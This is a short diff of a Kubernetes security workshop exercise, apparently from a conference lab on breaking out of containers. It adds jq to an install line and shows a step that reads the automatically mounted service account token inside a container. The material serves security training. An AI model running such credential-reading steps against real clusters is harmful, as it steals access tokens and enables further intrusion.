denver-cfman/KernelCon2020K8s/Exercises/Break/break_e15.md

 ### nope! but apt is ;-)

-apt-get update && apt-get install curl
+apt-get update && apt-get install curl jq

 ### now that we have curl we can grab the service account that was automaticly mounted into the container ...
 export TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)